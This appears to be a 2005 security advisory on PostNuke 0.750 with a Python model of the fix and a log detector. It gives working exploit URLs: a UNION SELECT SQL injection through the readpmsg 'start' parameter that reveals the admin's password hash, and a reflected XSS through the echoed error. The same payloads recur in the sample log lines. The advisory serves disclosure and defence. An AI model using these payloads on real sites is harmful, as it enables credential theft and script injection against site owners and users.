Details : SecurityReason Advisory
Topic : Critical SQL injection and XSS in PostNuke
SecurityAlert : 20
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : Yes
Exploit Given : Yes
Credit : sp3x
Date : 10.09.2005
Affected Software : PostNuke 0.750 and earlier
Advisory Text : -=[ Critical SQL injection and XSS in PostNuke ]=-
Author: sp3x
Date: 27. May 2005
Affected software :
===================
PostNuke version : 0.750 and earlier
Description :
=============
PostNuke is an open source, open development content management system (CMS).
PostNuke started as a fork of PHP-Nuke (http://www.phpnuke.org) and provides
many enhancements and improvements over the PHP-Nuke system. PostNuke is still
under development, but a large number of core functions are now stabilising
and a complete API for third-party developers is in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC server irc.postnuke.com, channels:
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/
Vulnerabilities :
*****************
Critical SQL injection :
========================
Code :
------
/modules/Messages/readpmsg.php
=======================
// $start is taken from the request (start=...) and handed unchanged to
// SelectLimit() as the LIMIT offset; only to_userid is cast to int.
$sql = "SELECT $column[msg_id] AS \"msg_id\",
               $column[msg_image] AS \"msg_image\",
               $column[subject] AS \"subject\",
               $column[from_userid] AS \"from_userid\",
               $column[to_userid] AS \"to_userid\",
               $column[msg_time] AS \"msg_time\",
               $column[msg_text] AS \"msg_text\",
               $column[read_msg] AS \"read_msg\"
        FROM $pntable[priv_msgs]
        WHERE $column[to_userid]='" . (int)pnVarPrepForStore($userdata) . "'";
$resultID =& $dbconn->SelectLimit($sql, 1, $start);
if ($dbconn->ErrorNo() <> 0) {
    error_log("DB Error: " . $dbconn->ErrorMsg());
    // the raw MySQL error, including whatever was injected, is echoed unescaped
    echo $dbconn->ErrorMsg() . "<br />";
    forumerror(0005);
}
=======================
First, log in as a normal user in PostNuke, then send a private message to
yourself (so that readpmsg has a row to fetch). After that go to:
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0[SQL inj]&total_messages=1
Note :
------
total_messages=1 - the total_messages parameter must be supplied with a valid value
Because $start is used verbatim as the LIMIT offset, you will see this error message:
error message :
---------------
========================
You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near '[SQL
injection],1' at line 10
========================
Exploit SQL injection :
=======================
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null%20FROM%20pn_users%20WHERE%20pn_uid=2/*&total_messages=1
The injected UNION supplies the same eight columns as the original SELECT, the
original query returns no rows (LIMIT 0), and the trailing /* comments out the
",1" that SelectLimit() appends. The page then displays the admin's nickname
and MD5 password hash in place of the private message :)
Cross-site scripting - XSS :
============================
Since readpmsg.php echoes $dbconn->ErrorMsg() to the page without escaping it,
the same error message can also be used for reflected XSS :)
Example :
---------
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0'<h1>cXIb8O3 and sp3x - SecurityReason</h1>&total_messages=1
And we get :
error message :
---------------
========================
You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near ''[Our XSS],1'
at line 10
========================
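The following Python model is added here as an example; it is not PostNuke's or ADODB's code and not the patch shipped in PNSA 2005-2. It reproduces how the start parameter reaches the LIMIT clause of the query above, shows the integer cast that neutralises both the UNION payload and the XSS payload, and scans constructed Apache access-log lines for readpmsg requests whose start value is not a plain integer. Assumed for the example: the table is pn_priv_msgs and the columns carry the pn_ prefix seen in the exploit URL; the MySQL ADODB driver appends "LIMIT offset,nrows", as the error messages above indicate; the log lines are made up for this page.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Column list from the readpmsg.php snippet; the pn_ prefix and the table
# name pn_priv_msgs are assumptions for this example.
COLUMNS = ["msg_id", "msg_image", "subject", "from_userid",
           "to_userid", "msg_time", "msg_text", "read_msg"]


def build_readpmsg_query(to_userid, start, nrows=1):
    """Vulnerable form, mirroring the unfixed module: to_userid is cast to
    int (as in the snippet), but `start` is spliced verbatim into the
    "LIMIT offset,nrows" suffix that ADODB's MySQL SelectLimit() adds."""
    select = ", ".join(f'pn_{c} AS "{c}"' for c in COLUMNS)
    sql = (f"SELECT {select} FROM pn_priv_msgs "
           f"WHERE pn_to_userid='{int(to_userid)}'")
    return f"{sql} LIMIT {start},{nrows}"


def clean_start(raw):
    """Hardened form: the same truncation PHP's (int) cast performs, so
    '0 UNION SELECT ...' and "0'<h1>" both collapse to 0 and only a bare,
    non-negative integer can ever reach the LIMIT clause."""
    m = re.match(r"\s*[+-]?\d+", raw)
    return max(0, int(m.group())) if m else 0


def find_readpmsg_injections(log_lines):
    """Detection: return (line number, decoded start value) for every
    access-log request to modules.php?name=Messages&file=readpmsg whose
    start parameter is not a plain integer. Both payloads from the
    advisory (the UNION SELECT and the <h1> XSS) trip the same rule."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/modules.php"):
            continue
        qs = parse_qs(url.query, keep_blank_values=True)
        if qs.get("name") != ["Messages"] or qs.get("file") != ["readpmsg"]:
            continue
        for start in qs.get("start", []):
            if not start.isdigit():
                hits.append((n, start))
    return hits


# Constructed access-log lines for this example (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Sep/2005:12:00:01 +0200] "GET /postnuke/modules.php'
    '?op=modload&name=Messages&file=readpmsg&start=0&total_messages=1 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [10/Sep/2005:12:00:07 +0200] "GET /postnuke/modules.php'
    '?op=modload&name=Messages&file=readpmsg&start=0%20UNION%20SELECT%20pn_uname,null,'
    'pn_uname,pn_pass,pn_pass,null,pn_pass,null%20FROM%20pn_users%20WHERE%20pn_uid=2/*'
    '&total_messages=1 HTTP/1.1" 200 5380',
    '10.0.0.5 - - [10/Sep/2005:12:00:09 +0200] "GET /postnuke/modules.php'
    '?op=modload&name=Messages&file=readpmsg&start=0%27%3Ch1%3EcXIb8O3%3C/h1%3E'
    '&total_messages=1 HTTP/1.1" 200 5201',
    '10.0.0.9 - - [10/Sep/2005:12:01:00 +0200] "GET /postnuke/modules.php'
    '?op=modload&name=News&file=index&start=0%27 HTTP/1.1" 200 9000',
]

UNION_PAYLOAD = ("0 UNION SELECT pn_uname,null,pn_uname,pn_pass,pn_pass,"
                 "null,pn_pass,null FROM pn_users WHERE pn_uid=2/*")

if __name__ == "__main__":
    print("vulnerable:", build_readpmsg_query(2, UNION_PAYLOAD))
    print("hardened:  ", build_readpmsg_query(2, clean_start(UNION_PAYLOAD)))
    for n, start in find_readpmsg_injections(SAMPLE_LOG):
        print(f"line {n}: suspicious start={start!r}")
```

The detection rule is deliberately narrow (only the Messages/readpmsg endpoint, only the start parameter) so it can run over large logs without noise; the fourth sample line, which carries a quote in a different module, is left alone. Casting is only the minimal fix: binding the offset as an integer parameter, or using SelectLimit() with an already-validated integer, is the durable one.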
How to fix :
============
PNSA 2005-2
Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html
SHA1: 6e76d92124c833618d02dfdb87d699374120967d
MD5: a007e741be11389a986b1d8928a6c0e5
Size: 160550 Bytes
or update from CVS
Greets :
========
cXIb8O3 and pkw :)
Contact :
=========
sp3x[at]securityreason[dot]com
www.securityreason.com